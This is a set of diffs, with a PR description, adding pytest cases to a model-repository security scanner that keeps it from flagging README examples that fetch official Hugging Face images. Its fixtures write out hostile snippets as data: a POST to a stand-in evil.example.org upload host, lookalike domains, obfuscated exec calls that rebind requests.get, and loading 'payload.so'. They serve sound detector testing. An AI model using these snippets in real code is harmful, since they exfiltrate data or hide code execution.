+    def test_readme_official_image_ignores_nonexecutable_requests_mentions(self, additional_fence: str) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "requests.get(image_url, stream=True)\n```\n"
+            f"{additional_fence}"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize("outside_request", ["requests.patch(input())\n", "```\nrequests.patch(input())\n```\n"])
+    def test_readme_official_image_preserves_requests_outside_validated_python_fence(
+        self,
+        outside_request: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "requests.get(image_url, stream=True)\n```\n"
+            f"{outside_request}"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
 
     def test_official_sample_image_does_not_suppress_executable_python(self) -> None:
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2769,6 +2769,7 @@ class TestNetworkCommDetector:
         [
             "https://huggingface.co/spaces/ds4sd/demo/resolve/main/examples/sample.png",
             "https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/car.jpg?download=true",
+            "https://HuggingFace.CO/spaces/ds4sd/demo/resolve/main/examples/sample.png",
         ],
     )
     def test_readme_python_example_official_sample_image_has_no_network_false_positive(
@@ -2836,6 +2837,7 @@ class TestNetworkCommDetector:
             "requests.get(image_url, stream=True, proxies=payload)",
             "requests.get = payload\nrequests.get(image_url, stream=True)",
             "setattr(requests, 'get', payload)\nrequests.get(image_url, stream=True)",
+            "fetch = requests.get\nrequests.get(image_url, stream=True)\nfetch(input())",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(
@@ -2864,6 +2866,18 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_large_readme_keeps_bounded_official_sample_image_example(self) -> None:
+        data = (
+            (b"Documentation prose.\n" * 4000)
+            + b"```python\nimport requests\n"
+            + b"url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            + b"requests.get(url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_official_image_in_different_fence_does_not_suppress_network_call(self) -> None:
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2874,6 +2874,13 @@ class TestNetworkCommDetector:
             "import attacker as print\nprint()\nrequests.get(image_url, stream=True)",
             "requests.get(image_url, stream=True)\nplugin.activate()",
             "response = requests.get(image_url, stream=True)\nresponse.exfiltrate()",
+            "print.__self__.__dict__['ex' + 'ec']('requests.get = print')\nrequests.get(image_url, stream=True)",
+            (
+                "assert print.__self__.__dict__['ex' + 'ec']('requests.get = print') is None\n"
+                + "requests.get(image_url, stream=True)"
+            ),
+            "torch.ops.load_library('payload.so')\nrequests.get(image_url, stream=True)",
+            "(lambda: payload)()\nrequests.get(image_url, stream=True)",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(
@@ -3006,6 +3013,42 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_official_image_does_not_suppress_requests_in_another_fence(self) -> None:
+        data = (
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+            b"```python\nrequests.patch(input())\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+
+    def test_readme_official_image_fence_index_stays_bounded(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        validated_examples: list[bytes] = []
+        original_validator = network_comm._is_valid_official_readme_sample_image_example
+
+        def count_validation(example: bytes) -> bool:
+            validated_examples.append(example)
+            return original_validator(example)
+
+        monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation)
+        example = (
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+        data = example * (network_comm._MAX_README_IMAGE_EXAMPLE_FENCES + 1)
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert len(validated_examples) == network_comm._MAX_README_IMAGE_EXAMPLE_FENCES
+        assert any(finding["type"] == "network_library" for finding in findings)
 
     def test_network_function_with_parentheses_still_flagged_in_metadata_context(self) -> None:
         """Executable-looking calls should stay detectable even when embedded in metadata files."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2764,6 +2764,89 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    @pytest.mark.parametrize(
+        "image_url",
+        [
+            "https://huggingface.co/spaces/ds4sd/demo/resolve/main/examples/sample.png",
+            "https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/car.jpg?download=true",
+        ],
+    )
+    def test_readme_python_example_official_sample_image_has_no_network_false_positive(
+        self,
+        image_url: str,
+    ) -> None:
+        data = (
+            "# Model card\n\n```python\nimport requests\n"
+            f"image_url = {image_url!r}\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+        assert any(finding["type"] == "cloud_storage_url" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "image_url",
+        [
+            "http://huggingface.co/org/model/resolve/main/sample.png",
+            "https://evil.example.org/sample.png",
+            "https://huggingface.co.evil.example.org/sample.png",
+            "https://huggingface.co/org/model/resolve/main/payload.py",
+            "https://huggingface.co/org/model/resolve/main/sample.png?next=https://evil.example.org/payload",
+        ],
+    )
+    def test_readme_python_example_preserves_untrusted_image_network_detection(
+        self,
+        image_url: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            f"image_url = {image_url!r}\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_preserves_mixed_untrusted_requests(self) -> None:
+        data = (
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n"
+            b"requests.post('https://evil.example.org/upload')\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_official_sample_image_does_not_suppress_executable_python(self) -> None:
+        data = (
+            b"import requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "example.py")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_official_image_in_different_fence_does_not_suppress_network_call(self) -> None:
+        data = (
+            b"```python\nimage_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n```\n"
+            b"```python\nimport requests\nrequests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     def test_network_function_with_parentheses_still_flagged_in_metadata_context(self) -> None:
         """Executable-looking calls should stay detectable even when embedded in metadata files."""
         detector = NetworkCommDetector()

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2824,6 +2824,35 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
 
+    @pytest.mark.parametrize(
+        "mutator",
+        [
+            "for image_url in [input()]:\n    requests.get(image_url, stream=True)",
+            "image_url: str = input()\nrequests.get(image_url, stream=True)",
+            "(image_url := input())\nrequests.get(image_url, stream=True)",
+            "def load(image_url):\n    requests.get(image_url, stream=True)",
+            "requests = payload\nrequests.get(image_url, stream=True)",
+            "requests.get(image_url)",
+            "requests.get(image_url, stream=True, proxies=payload)",
+            "requests.get = payload\nrequests.get(image_url, stream=True)",
+            "setattr(requests, 'get', payload)\nrequests.get(image_url, stream=True)",
+        ],
+    )
+    def test_readme_python_example_preserves_rebound_or_unproven_requests(
+        self,
+        mutator: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{mutator}\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     def test_official_sample_image_does_not_suppress_executable_python(self) -> None:
         data = (
             b"import requests\n"

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2859,6 +2859,11 @@ class TestNetworkCommDetector:
             "requests.get(image_url, stream=True)\nmatch payload:\n    case image_url:\n        fetch(image_url)",
             "builtins.exec('requests.get(input())')\nrequests.get(image_url, stream=True)",
             "namespace['exec']('requests.get(input())')\nrequests.get(image_url, stream=True)",
+            "from attacker import endpoint as image_url\nrequests.get(image_url, stream=True)",
+            "import attacker as image_url\nrequests.get(image_url, stream=True)",
+            "replace_requests_get()\nrequests.get(image_url, stream=True)",
+            "from attacker import install_hook\ninstall_hook()\nrequests.get(image_url, stream=True)",
+            "__builtins__['ex' + 'ec']('requests.get(input())')\nrequests.get(image_url, stream=True)",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(

--- a/tests/scanners/test_text_scanner.py
+++ b/tests/scanners/test_text_scanner.py
@@ -419,7 +419,7 @@ def test_text_scanner_documentation_urls_are_informational(tmp_path: Path) -> No
     assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues)
 
 
-@pytest.mark.parametrize("filename", ["README.md", "README"])
+@pytest.mark.parametrize("filename", ["README.md", "README", "README.en.md", "README.markdown"])
 def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_path: Path, filename: str) -> None:
     text_path = tmp_path / filename
     text_path.write_text(

--- a/tests/scanners/test_text_scanner.py
+++ b/tests/scanners/test_text_scanner.py
@@ -419,8 +419,9 @@ def test_text_scanner_documentation_urls_are_informational(tmp_path: Path) -> No
     assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues)
 
 
-def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_path: Path) -> None:
-    text_path = tmp_path / "README.md"
+@pytest.mark.parametrize("filename", ["README.md", "README"])
+def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_path: Path, filename: str) -> None:
+    text_path = tmp_path / filename
     text_path.write_text(
         "# Example\n```python\nimport requests\n"
         "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n"

--- a/tests/scanners/test_text_scanner.py
+++ b/tests/scanners/test_text_scanner.py
@@ -419,6 +419,46 @@ def test_text_scanner_documentation_urls_are_informational(tmp_path: Path) -> No
     assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues)
 
 
+def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_path: Path) -> None:
+    text_path = tmp_path / "README.md"
+    text_path.write_text(
+        "# Example\n```python\nimport requests\n"
+        "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n"
+        "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n",
+        encoding="utf-8",
+    )
+
+    result = TextScanner().scan(str(text_path))
+
+    assert result.success is True
+    assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues)
+    assert not any(
+        check.name == "Network Communication Detection"
+        and check.details.get("type") in {"network_function", "network_library"}
+        for check in result.checks
+    )
+
+
+def test_text_scanner_readme_plain_http_sample_image_stays_actionable(tmp_path: Path) -> None:
+    text_path = tmp_path / "README.md"
+    text_path.write_text(
+        "```python\nimport requests\n"
+        "image_url = 'http://huggingface.co/spaces/org/demo/resolve/main/image.png'\n"
+        "requests.get(image_url, stream=True)\n```\n",
+        encoding="utf-8",
+    )
+
+    result = TextScanner().scan(str(text_path))
+
+    assert result.success is False
+    assert any(
+        check.name == "Network Communication Detection"
+        and check.status == CheckStatus.FAILED
+        and check.details.get("type") == "network_function"
+        for check in result.checks
+    )
+
+
 @pytest.mark.parametrize(
     ("filename", "command"),
     [


### PR DESCRIPTION
## Summary
- suppress requests import and GET findings only for bounded README Python examples that statically resolve to official HTTPS Hugging Face image URLs
- preserve non-HTTPS, external-host, executable, cross-fence, and mixed-request detections
- reproduce pinned docling-project/docling-layout-heron and microsoft/Florence-2-base model-card false positives without executing repository code

## Verification
- 543 network detector and integration tests pass; 9 environment-specific tests skipped
- text scanner benign official-image and malicious plain-HTTP regressions pass
- Ruff and mypy pass on all modified Python files
- both pinned real README artifacts scan successfully without the false positive